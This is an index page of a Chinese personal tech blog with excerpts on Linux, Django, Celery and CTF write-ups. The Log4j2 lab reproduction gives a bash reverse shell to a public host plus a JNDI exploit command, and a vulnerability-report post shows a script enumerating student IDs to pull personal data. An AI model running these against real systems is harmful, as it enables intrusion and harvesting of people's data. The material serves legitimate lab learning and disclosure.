<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"><title>Mox的笔记库</title><meta name="keywords" content="Working"><meta name="author" content="MocusEZ"><meta name="copyright" content="MocusEZ"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta name="description" content="探索未曾设想的道路">
<meta property="og:type" content="website">
<meta property="og:title" content="Mox的笔记库">
<meta property="og:url" content="https://www.mocusez.site/page/3/index.html">
<meta property="og:site_name" content="Mox的笔记库">
<meta property="og:description" content="探索未曾设想的道路">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://www.mocusez.site/img/head.jpg">
<meta property="article:author" content="MocusEZ">
<meta property="article:tag" content="Working">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://www.mocusez.site/img/head.jpg"><link rel="shortcut icon" href="/img/title.jpg"><link rel="canonical" href="https://www.mocusez.site/page/3/"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//hm.baidu.com"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.min.css" media="print" onload="this.media='all'"><script>var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?c85c9eaebc158345532b86397a6dded9";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script><script>const GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: {"path":"/search.xml","preload":false,"languages":{"hits_empty":"找不到您查询的内容：${query}"}},
  translate: undefined,
  noticeOutdate: undefined,
  highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '天',
  date_suffix: {
    just: '刚刚',
    min: '分钟前',
    hour: '小时前',
    day: '天前',
    month: '个月前'
  },
  copyright: undefined,
  lightbox: 'fancybox',
  Snackbar: undefined,
  source: {
    justifiedGallery: {
      js: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery/dist/fjGallery.min.js',
      css: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery/dist/fjGallery.min.css'
    }
  },
  isPhotoFigcaption: false,
  islazyload: false,
  isAnchor: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
  title: 'Mox的笔记库',
  isPost: false,
  isHome: true,
  isHighlightShrink: false,
  isToc: false,
  postUpdate: '2023-10-21 12:23:56'
}</script><noscript><style type="text/css">
  #nav {
    opacity: 1
  }
  .justified-gallery img {
    opacity: 1
  }

  #recent-posts time,
  #post-meta time {
    display: inline !important
  }
</style></noscript><script>(win=>{
    win.saveToLocal = {
      set: function setWithExpiry(key, value, ttl) {
        if (ttl === 0) return
        const now = new Date()
        const expiryDay = ttl * 86400000
        const item = {
          value: value,
          expiry: now.getTime() + expiryDay,
        }
        localStorage.setItem(key, JSON.stringify(item))
      },

      get: function getWithExpiry(key) {
        const itemStr = localStorage.getItem(key)

        if (!itemStr) {
          return undefined
        }
        const item = JSON.parse(itemStr)
        const now = new Date()

        if (now.getTime() > item.expiry) {
          localStorage.removeItem(key)
          return undefined
        }
        return item.value
      }
    }
  
    win.getScript = url => new Promise((resolve, reject) => {
      const script = document.createElement('script')
      script.src = url
      script.async = true
      script.onerror = reject
      script.onload = script.onreadystatechange = function() {
        const loadState = this.readyState
        if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
        script.onload = script.onreadystatechange = null
        resolve()
      }
      document.head.appendChild(script)
    })
  
      win.activateDarkMode = function () {
        document.documentElement.setAttribute('data-theme', 'dark')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
        }
      }
      win.activateLightMode = function () {
        document.documentElement.setAttribute('data-theme', 'light')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
        }
      }
      const t = saveToLocal.get('theme')
    
          if (t === 'dark') activateDarkMode()
          else if (t === 'light') activateLightMode()
        
      const asideStatus = saveToLocal.get('aside-status')
      if (asideStatus !== undefined) {
        if (asideStatus === 'hide') {
          document.documentElement.classList.add('hide-aside')
        } else {
          document.documentElement.classList.remove('hide-aside')
        }
      }
    
    const detectApple = () => {
      if(/iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)){
        document.documentElement.classList.add('apple')
      }
    }
    detectApple()
    })(window)</script><meta name="generator" content="Hexo 6.2.0"><link rel="alternate" href="/atom.xml" title="Mox的笔记库" type="application/atom+xml">
</head><body><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img is-center"><img src="/img/head.jpg" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="sidebar-site-data site-data is-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">61</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">0</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">8</div></a></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 归档</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 友链&amp;私人收藏</span></a></div><div class="menus_item"><a class="site-page" href="/board/"><i class="fa-fw fas fa-user"></i><span> 留言板</span></a></div></div></div></div><div class="page" id="body-wrap"><header class="full_page" id="page-header" style="background-image: url('/img/kali-2.0_kali-2.0-1920x1080.png')"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">Mox的笔记库</a></span><div id="menus"><div id="search-button"><a class="site-page social-icon search"><i class="fas fa-search fa-fw"></i><span> 搜索</span></a></div><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 归档</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 友链&amp;私人收藏</span></a></div><div class="menus_item"><a class="site-page" href="/board/"><i class="fa-fw fas fa-user"></i><span> 留言板</span></a></div></div><div id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></div></div></nav><div id="site-info"><h1 id="site-title">Mox的笔记库</h1><div id="site-subtitle"><span id="subtitle"></span></div><div id="site_social_icons"><a class="social-icon" href="https://github.com/mocusez" rel="external nofollow noreferrer" target="_blank" title="Github"><i class="fab fa-github"></i></a><a class="social-icon" href="mailto:285918468@qq.com" rel="external nofollow noreferrer" target="_blank" title="Email"><i class="fas fa-envelope"></i></a><a class="social-icon" href="/atom.xml" target="_blank" title="RSS"><i class="fas fa-rss"></i></a></div></div><div id="scroll-down"><i class="fas fa-angle-down scroll-down-effects"></i></div></header><main class="layout" id="content-inner"><div class="recent-posts" id="recent-posts"><div class="recent-post-item"><div class="post_cover left"><a href="/posts/b081.html" title="Arch Linux迁移计划"><img class="post_bg" src="https://pic.rmb.bdstatic.com/bjh/96117c842daeb305932d8e1ee65ac796.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="Arch Linux迁移计划"></a></div><div class="recent-post-info"><a class="article-title" href="/posts/b081.html" title="Arch Linux迁移计划">Arch Linux迁移计划</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2022-06-28T03:26:26.000Z" title="发表于 2022-06-28 11:26:26">2022-06-28</time></span><span class="article-meta"><span class="article-meta-separator">|</span><i class="fas fa-inbox"></i><a class="article-meta__categories" href="/categories/Arch-Linux%E6%8A%98%E8%85%BE/">Arch Linux折腾</a></span></div><div class="content">Arch Linux迁移计划食用指北如果是从零开始安装，建议直接跳到 大佬教程 章节，无需看完正文内容
对于Linux的苦难哲学论述感兴趣的，可以翻到文章结尾去找
善用 Ctrl+F 可以事半功倍
后续还会不定期填坑更新
本文的Arch Linux安装于2022年6月，不保证有关Arch Linux内容在一年后依然有效
前言
自由的代价总是昂贵的，但未必使人感到幸福自由必然是需要代价的，你要求的自由度越大，实现的难度系数越高，代价就越大阳光之下总有阴影不自由才能衬托自由人类是群居动物，社会规则之外争取到的自由，格外珍贵，当然昂贵


2023.1.30最后更新
由于Arch Linux更新kernel 6.18的时候，硬件管理出现问题（电源灯闪烁，CPU频率大幅度降低），外加调试KVM显卡直通时对硬件造成的影响，重新用回Windows了

开始这是一项我长期计划的一个任务：使用Linux完成Windows的替代
随着学校大创项目的顺利解题，使我有机会告别那些优化垃圾的专属开发软件（Keil,Multisim），外加Nvidia开源了GTX 20系的驱动，扫清了之前退坑的问题。外加国产固 ...</div></div></div><div class="recent-post-item"><div class="post_cover right"><a href="/posts/c093.html" title="Django事务使用"><img class="post_bg" src="https://pic.rmb.bdstatic.com/bjh/bf369179e3f27cb4d01dafb597122ae1.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="Django事务使用"></a></div><div class="recent-post-info"><a class="article-title" href="/posts/c093.html" title="Django事务使用">Django事务使用</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2022-04-29T13:20:26.000Z" title="发表于 2022-04-29 21:20:26">2022-04-29</time></span><span class="article-meta"><span class="article-meta-separator">|</span><i class="fas fa-inbox"></i><a class="article-meta__categories" href="/categories/%E6%97%A5%E5%B8%B8%E7%AC%94%E8%AE%B0/">日常笔记</a></span></div><div class="content">做DRF项目的时候遇到了一个问题：一次请求，要同时在数据库里的三张表里创建字段，且三个字段存在相互依赖关系（B的字段里有A的pk键值），且其中任何一个字段校验失败，三张表都要撤回写入。折腾了老半天，在学长提醒用Django事务去解决的时候，才意识的这个操作应该要符合原子性
数据库事务看DJango文档
https://docs.djangoproject.com/zh-hans/3.2/topics/db/transactions/

完美契合需求
Django 提供了一个 API 控制数据库事务。

atomic(using&#x3D;None, savepoint&#x3D;True, durable&#x3D;False)¶
原子性是数据库事务的定义属性。 atomic 允许创建代码块来保证数据库的原子性。如果代码块成功创建，这个变动会提交到数据库。如果有异常，变动会回滚。


要避免在 atomic 内部捕捉异常！
当存在 atomic 块时， Django 查看它是否正常退出或存在异常来决定是提交还是正常回滚。如果你在 atomic 内部捕捉并且处理异常，你可以对 Djang ...</div></div></div><div class="recent-post-item"><div class="post_cover left"><a href="/posts/5262.html" title="记录第一次EduSRC上报"><img class="post_bg" src="https://pic.rmb.bdstatic.com/bjh/d21a853b813232f724f93d6a4e07bbfd.jpeg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="记录第一次EduSRC上报"></a></div><div class="recent-post-info"><a class="article-title" href="/posts/5262.html" title="记录第一次EduSRC上报">记录第一次EduSRC上报</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2022-04-29T12:47:26.000Z" title="发表于 2022-04-29 20:47:26">2022-04-29</time></span><span class="article-meta"><span class="article-meta-separator">|</span><i class="fas fa-inbox"></i><a class="article-meta__categories" href="/categories/%E6%97%A5%E5%B8%B8%E7%AC%94%E8%AE%B0/">日常笔记</a></span></div><div class="content">先上图，第一次上报漏洞成功，当时还开心了好一阵，其实也没啥技术含量，一个低危漏洞

第一次上报3月15日，做核酸检测的时候偶然发现的，拿BurpSuite打一梭子，没想到真的爆出信息泄露，也不做URL加密，无语了

测试脚本
12345import requestsstr1 = &quot;https://*****.xaut.edu.cn/educational/nucleic_acid_collect/getStudentInfo?stuNum=&quot;for i in range(3140131001,3140131050):    response = requests.get(str1+str(i))    print(response.text)

然后拿着这些信息就去上报了
https://src.sjtu.edu.cn/
很快啊，早上上报，下午就拿到邮件了

人生第一个SRC到手
梅开二度其实吧，修复速度还蛮快的（两天后就修复了），但治标不治本，原本的GET请求换为了POST请求，文字用URL+Base64加密，但对请求次数依然没有限制，还是可以很顺利的获取到信息
 ...</div></div></div><div class="recent-post-item"><div class="post_cover right"><a href="/posts/f49e.html" title="Jetbrain问题应急处理"><img class="post_bg" src="https://pic.rmb.bdstatic.com/bjh/00e44c4b5f89d5c6a765102994e011ae.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="Jetbrain问题应急处理"></a></div><div class="recent-post-info"><a class="article-title" href="/posts/f49e.html" title="Jetbrain问题应急处理">Jetbrain问题应急处理</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2022-04-29T12:00:26.000Z" title="发表于 2022-04-29 20:00:26">2022-04-29</time></span><span class="article-meta"><span class="article-meta-separator">|</span><i class="fas fa-inbox"></i><a class="article-meta__categories" href="/categories/%E6%97%A5%E5%B8%B8%E7%AC%94%E8%AE%B0/">日常笔记</a></span></div><div class="content">大概是这周一的时候，下完Edison的课，去上java课的时候，发现自己手上的IDEA卡死打不开了，随后PyCharm,Clion也都相继无法打开，人开始有点慌了。
手动把2021.3的版的IDEA卸载，换成2022.1，启动照样出错，但弹出了错误提示
1234567891011121314151617181920212223242526272829303132com.intellij.ide.plugins.StartupAbortedException: Cannot start app	at com.intellij.idea.StartupUtil.lambda$start$15(StartupUtil.java:263)	at java.base/java.util.concurrent.CompletableFuture.uniExceptionally(CompletableFuture.java:986)	at java.base/java.util.concurrent.CompletableFuture$UniExceptionally.tryFire(Comple ...</div></div></div><div class="recent-post-item"><div class="post_cover left"><a href="/posts/f225.html" title="Celery5.2学习&amp;配置"><img class="post_bg" src="https://pic2.zhimg.com/v2-bd1fc12cd030e5b62475ac4620f612ad_1440w.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="Celery5.2学习&amp;配置"></a></div><div class="recent-post-info"><a class="article-title" href="/posts/f225.html" title="Celery5.2学习&amp;配置">Celery5.2学习&amp;配置</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2022-04-18T14:00:26.000Z" title="发表于 2022-04-18 22:00:26">2022-04-18</time></span><span class="article-meta"><span class="article-meta-separator">|</span><i class="fas fa-inbox"></i><a class="article-meta__categories" href="/categories/%E6%97%A5%E5%B8%B8%E7%AC%94%E8%AE%B0/">日常笔记</a></span></div><div class="content">Celery5.2学习&amp;配置手头的Django 3.2项目需要Celery，一翻百度，发现全是基于Django 2.2的帖子，再一看官方仓库和文档，妈耶，清一色英文说明。有个半吊子的中文翻译（又不是不能看.jpg），只能自己摸坑慢慢爬去了。
本篇文章全程无图，字多慎入
官方仓库地址：
https://github.com/celery/celery/
官方文档
https://docs.celeryq.dev/en/stable/
自己写的项目（后端不会长期开着，要测试本地自行踩坑自建）
https://gitee.com/mocus/todo-list
同一批写的项目，如果ta们开放权限的话应该能看到，也是用了celery的
https://gitee.com/li-jiayin167
https://gitee.com/BabyMuu/todo-api
https://github.com/YichenWu11/simple-todolist
什么是Celery高性能异步框架，支持异步调用，需要RabbitMQ或redis作为队列支撑
我觉得这个讲的不错，这里就不过多赘述了 ...</div></div></div><div class="recent-post-item"><div class="post_cover right"><a href="/posts/4cf.html" title="Waline部署记录"><img class="post_bg" src="https://waline.js.org/logo.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="Waline部署记录"></a></div><div class="recent-post-info"><a class="article-title" href="/posts/4cf.html" title="Waline部署记录">Waline部署记录</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2022-02-10T15:14:00.000Z" title="发表于 2022-02-10 23:14:00">2022-02-10</time></span><span class="article-meta"><span class="article-meta-separator">|</span><i class="fas fa-inbox"></i><a class="article-meta__categories" href="/categories/%E6%97%A5%E5%B8%B8%E7%AC%94%E8%AE%B0/">日常笔记</a></span></div><div class="content">Waline部署记录吐槽一下，腾讯云开发白嫖不起了（每日数据库读取量从50000变500，不太能接受）
而且Twikco控制面板被我给搞崩了，貌似是一次性升了一个大版本导致的，不得不用两个晚上重新部署评论
Waline的文档不错，但配置真心不友好，全是docker环境变量
jsdelivr国内备案没了，这对与用Hexo博客的人而言太不友好了
查到掘金有Waline的CDN，大喜，立换之

顺手也把其他js的CDN给换了
Waline官网
https://waline.js.org/
安装&amp;&amp;使用当然首选docker pull，省掉构建镜像的麻烦
1docker pull izheming/waline

漫长等待后开始部署（好像没配置国内镜像源）
提前准备好sqlite文件(支持MySql，但我觉的sqlite就够了，不用担心多开一个端口被人问候的问题)
https://github.com/walinejs/waline/blob/main/assets/waline.sqlite
其实应该要用Docker Compose的，但安装的时候搞崩了，只能脚本解决问题

有 ...</div></div></div><div class="recent-post-item"><div class="post_cover left"><a href="/posts/61f6.html" title="Frida hook初次实战"><img class="post_bg" src="https://pic1.zhimg.com/v2-137105887817f87ee3f6939434fa5a2d_r.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="Frida hook初次实战"></a></div><div class="recent-post-info"><a class="article-title" href="/posts/61f6.html" title="Frida hook初次实战">Frida hook初次实战</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2022-02-08T04:12:00.000Z" title="发表于 2022-02-08 12:12:00">2022-02-08</time></span><span class="article-meta"><span class="article-meta-separator">|</span><i class="fas fa-inbox"></i><a class="article-meta__categories" href="/categories/Security%E7%AC%94%E8%AE%B0/">Security笔记</a></span></div><div class="content">Frida Hook初次实战做攻防世界的CTF题，看到有大佬搞Frida的操作，按照大佬做到试了一下
ill-intentions（Native hook）攻防世界——ill-intentions

frida,frida-server,objection该安装的都安装好
adb连接上机子
由于没有修改apk包，触发按钮的Intent显示不了，用objection手动开启
12objection -g com.example.hellojni exploreandroid intent launch_activity com.example.application.IsThisTheRealOne


效果如下

挂上大佬hook Native的脚本
12345678910111213141516171819202122232425262728293031323334353637383940//tt.js//出自https://blog.csdn.net/Palmer9/article/details/122464683//别问脚本什么意思，frida脚本还不太会写function m ...</div></div></div><div class="recent-post-item"><div class="post_cover right"><a href="/posts/c18a.html" title="NodeMCU-MicroPython配置实录"><img class="post_bg" src="https://pic3.zhimg.com/v2-8c8b9fa56cef3c07e5fbf09c49127062_1440w.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="NodeMCU-MicroPython配置实录"></a></div><div class="recent-post-info"><a class="article-title" href="/posts/c18a.html" title="NodeMCU-MicroPython配置实录">NodeMCU-MicroPython配置实录</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2022-01-20T11:22:00.000Z" title="发表于 2022-01-20 19:22:00">2022-01-20</time></span><span class="article-meta"><span class="article-meta-separator">|</span><i class="fas fa-inbox"></i><a class="article-meta__categories" href="/categories/%E6%97%A5%E5%B8%B8%E7%AC%94%E8%AE%B0/">日常笔记</a></span></div><div class="content">NodeMCU-MicroPython配置实录发现网络上的记录过于混杂，自己写一下笔记防止到时找不到资料
不会Python？百度搜索“菜鸟教程”，看看Python3就会了，人生苦短，我选Python
刷MicroPython包去micropython的官网下载，选择正常版本（2Mib+）下载即可

（此处默认已经装完Python，并默认加入path，如果未安装自行百度）
下载完以后，本地的pip使用这个指令：
1pip install esptool

找到设备所在的端口
控制面板-&gt;硬件和声音-&gt;设备管理器

得知我们的设备运行在COM3

在esp8266-20220117-v1.18.bin所在的目录，打开cmd输入以下命令
12esptool.py --port COM3 erase_flashesptool.py --port COM3 --baud 460800 write_flash --flash_size=detect 0 esp8266-20220117-v1.18.bin --verify

等待烧写成功
Thonny版本纯傻瓜教学版+免安装espto ...</div></div></div><div class="recent-post-item"><div class="post_cover left"><a href="/posts/8a62.html" title="Log4j2漏洞复现"><img class="post_bg" src="https://pic1.zhimg.com/v2-bd843f42914ff75f88b484341ce35e2d_1440w.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="Log4j2漏洞复现"></a></div><div class="recent-post-info"><a class="article-title" href="/posts/8a62.html" title="Log4j2漏洞复现">Log4j2漏洞复现</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2022-01-14T09:18:00.000Z" title="发表于 2022-01-14 17:18:00">2022-01-14</time></span><span class="article-meta"><span class="article-meta-separator">|</span><i class="fas fa-inbox"></i><a class="article-meta__categories" href="/categories/Security%E7%AC%94%E8%AE%B0/">Security笔记</a></span></div><div class="content">Log4j2漏洞复现”长安战疫“赛里用到了Log4j2漏洞，按照学长的建议，用靶场复现一下log4j2漏洞
云演靶场dnslog回显四叶草云演的环境不错
Log4j2靶场传送门
参考学长写的文章复现
lc219_log4j2复现
记得payload要url编码，在校园网里头DNSlog回显很有可能只显示一条（无论打多少下，结果依然显示一条）
血的教训，搭进去至少一个小时


反弹shell照抄云演的材料就行
12345bash -i &gt;&amp;/dev/tcp/公网地址/公网可访问的端口 0&gt;&amp;1bash -c &#123;echo,反弹shell的base64编码内容&#125;|&#123;base64,-d&#125;|&#123;bash,-i&#125;//在服务器上部署JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jarjava -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C &quot;bash -c &#123;echo,base64编码内容&#125;|&# ...</div></div></div><div class="recent-post-item"><div class="post_cover right"><a href="/posts/a585.html" title="2022长安“战疫”网络安全卫士守护赛回顾"><img class="post_bg" src="https://ae03.alicdn.com/kf/Ha7b43e66b9b84c7198a0b5d44b520138q.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="2022长安“战疫”网络安全卫士守护赛回顾"></a></div><div class="recent-post-info"><a class="article-title" href="/posts/a585.html" title="2022长安“战疫”网络安全卫士守护赛回顾">2022长安“战疫”网络安全卫士守护赛回顾</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2022-01-08T13:00:00.000Z" title="发表于 2022-01-08 21:00:00">2022-01-08</time></span><span class="article-meta"><span class="article-meta-separator">|</span><i class="fas fa-inbox"></i><a class="article-meta__categories" href="/categories/CTF%E9%A2%98%E8%A7%A3/">CTF题解</a></span></div><div class="content">2022长安“战疫”网络安全卫士守护赛回顾从从早上6点到晚上18点，除了去做核酸以外还没出过宿舍，（y1s1,中午快一点才把午餐送到，听说还闹了些不愉快的事情），先把题解写下，有的地方还需要日后补充（咕咕咕）
（持续更新中）
20221.1.13更新
四叶草还是给力，下面是复现靶场
https://www.yunyansec.com/#/experiment/expdetail/3
Reverse别问为什么reverse的前三题和官网的一样（因为就是我出的），要是知道大佬们要来，题目难度肯定会再上一个档次
hello_pyflag{He110_cazy}
pyc用网上的工具解密完以后，异或运算解决
题解：
12345678910111213141516flag=[44, 100, 3, 50, 106, 90, 5, 102, 10, 112]j=0for i in flag:    if j%2==0:        flag[j]=flag[j]^flag[j+1]        j+=1    else:        flag[j]=flag[j]^j        j+=1f ...</div></div></div><nav id="pagination"><div class="pagination"><a class="extend prev" rel="prev" href="/page/2/#content-inner"><i class="fas fa-chevron-left fa-fw"></i></a><a class="page-number" href="/">1</a><a class="page-number" href="/page/2/#content-inner">2</a><span class="page-number current">3</span><a class="page-number" href="/page/4/#content-inner">4</a><span class="space">&hellip;</span><a class="page-number" href="/page/7/#content-inner">7</a><a class="extend next" rel="next" href="/page/4/#content-inner"><i class="fas fa-chevron-right fa-fw"></i></a></div></nav></div><div class="aside-content" id="aside-content"><div class="card-widget card-info"><div class="is-center"><div class="avatar-img"><img src="/img/head.jpg" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="author-info__name">MocusEZ</div><div class="author-info__description">探索未曾设想的道路</div></div><div class="card-info-data site-data is-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">61</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">0</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">8</div></a></div><div class="card-info-social-icons is-center"><a class="social-icon" href="https://github.com/mocusez" rel="external nofollow noreferrer" target="_blank" title="Github"><i class="fab fa-github"></i></a><a class="social-icon" href="mailto:285918468@qq.com" rel="external nofollow noreferrer" target="_blank" title="Email"><i class="fas fa-envelope"></i></a><a class="social-icon" href="/atom.xml" target="_blank" title="RSS"><i class="fas fa-rss"></i></a></div></div><div class="card-widget card-announcement"><div class="item-headline"><i class="fas fa-bullhorn fa-shake"></i><span>公告</span></div><div class="announcement_content">迎接新的明天</div></div><div class="sticky_layout"><div class="card-widget card-recent-post"><div class="item-headline"><i class="fas fa-history"></i><span>最新文章</span></div><div class="aside-list"><div class="aside-list-item"><a class="thumbnail" href="/posts/3e9f.html" title="RMM观察与初探"><img src="https://z1.ax1x.com/2023/10/21/piF47TA.md.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="RMM观察与初探"/></a><div class="content"><a class="title" href="/posts/3e9f.html" title="RMM观察与初探">RMM观察与初探</a><time datetime="2023-10-21T04:30:00.000Z" title="发表于 2023-10-21 12:30:00">2023-10-21</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/posts/5e44.html" title="计算机网络课设——UDP/TCP/TLS Socket实验"><img src="https://s1.ax1x.com/2023/09/09/pP6qXOU.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="计算机网络课设——UDP/TCP/TLS Socket实验"/></a><div class="content"><a class="title" href="/posts/5e44.html" title="计算机网络课设——UDP/TCP/TLS Socket实验">计算机网络课设——UDP/TCP/TLS Socket实验</a><time datetime="2023-09-09T07:10:00.000Z" title="发表于 2023-09-09 15:10:00">2023-09-09</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/posts/cd44.html" title="JQuery的XSS初探"><img src="https://s1.ax1x.com/2023/09/08/pPyvO0O.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="JQuery的XSS初探"/></a><div class="content"><a class="title" href="/posts/cd44.html" title="JQuery的XSS初探">JQuery的XSS初探</a><time datetime="2023-09-08T04:30:00.000Z" title="发表于 2023-09-08 12:30:00">2023-09-08</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/posts/5862.html" title="生产实习记录"><img src="https://s1.ax1x.com/2023/09/02/pPBH058.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="生产实习记录"/></a><div class="content"><a class="title" href="/posts/5862.html" title="生产实习记录">生产实习记录</a><time datetime="2023-09-02T13:51:00.000Z" title="发表于 2023-09-02 21:51:00">2023-09-02</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/posts/9a9b.html" title="Fedora-CoreOS配置与试用（2023年）"><img src="https://s1.ax1x.com/2023/08/28/pPa8tlF.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="Fedora-CoreOS配置与试用（2023年）"/></a><div class="content"><a class="title" href="/posts/9a9b.html" title="Fedora-CoreOS配置与试用（2023年）">Fedora-CoreOS配置与试用（2023年）</a><time datetime="2023-08-28T11:35:00.000Z" title="发表于 2023-08-28 19:35:00">2023-08-28</time></div></div></div></div><div class="card-widget card-categories"><div class="item-headline">
            <i class="fas fa-folder-open"></i>
            <span>分类</span>
            
            </div>
            <ul class="card-category-list" id="aside-cat-list">
            <li class="card-category-list-item "><a class="card-category-list-link" href="/categories/Arch-Linux%E6%8A%98%E8%85%BE/"><span class="card-category-list-name">Arch Linux折腾</span><span class="card-category-list-count">4</span></a></li><li class="card-category-list-item "><a class="card-category-list-link" href="/categories/CTF%E9%A2%98%E8%A7%A3/"><span class="card-category-list-name">CTF题解</span><span class="card-category-list-count">7</span></a></li><li class="card-category-list-item "><a class="card-category-list-link" href="/categories/Security%E7%AC%94%E8%AE%B0/"><span class="card-category-list-name">Security笔记</span><span class="card-category-list-count">2</span></a></li><li class="card-category-list-item "><a class="card-category-list-link" href="/categories/Termux%E7%AC%94%E8%AE%B0/"><span class="card-category-list-name">Termux笔记</span><span class="card-category-list-count">3</span></a></li><li class="card-category-list-item "><a class="card-category-list-link" href="/categories/%E5%AD%A6%E4%B9%A0%E8%B5%84%E6%96%99/"><span class="card-category-list-name">学习资料</span><span class="card-category-list-count">4</span></a></li><li class="card-category-list-item "><a class="card-category-list-link" href="/categories/%E6%97%A5%E5%B8%B8%E7%AC%94%E8%AE%B0/"><span class="card-category-list-name">日常笔记</span><span class="card-category-list-count">38</span></a></li><li class="card-category-list-item "><a class="card-category-list-link" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E7%AC%94%E8%AE%B0/"><span class="card-category-list-name">渗透测试笔记</span><span class="card-category-list-count">1</span></a></li><li class="card-category-list-item "><a class="card-category-list-link" href="/categories/%E7%94%A8%E8%BF%87%E5%B0%B1%E4%B8%A2%E7%9A%84%E4%B8%9C%E8%A5%BF/"><span class="card-category-list-name">用过就丢的东西</span><span class="card-category-list-count">2</span></a></li>
            </ul></div><div class="card-widget card-archives"><div class="item-headline"><i class="fas fa-archive"></i><span>归档</span><a class="card-more-btn" href="/archives/" title="查看更多">
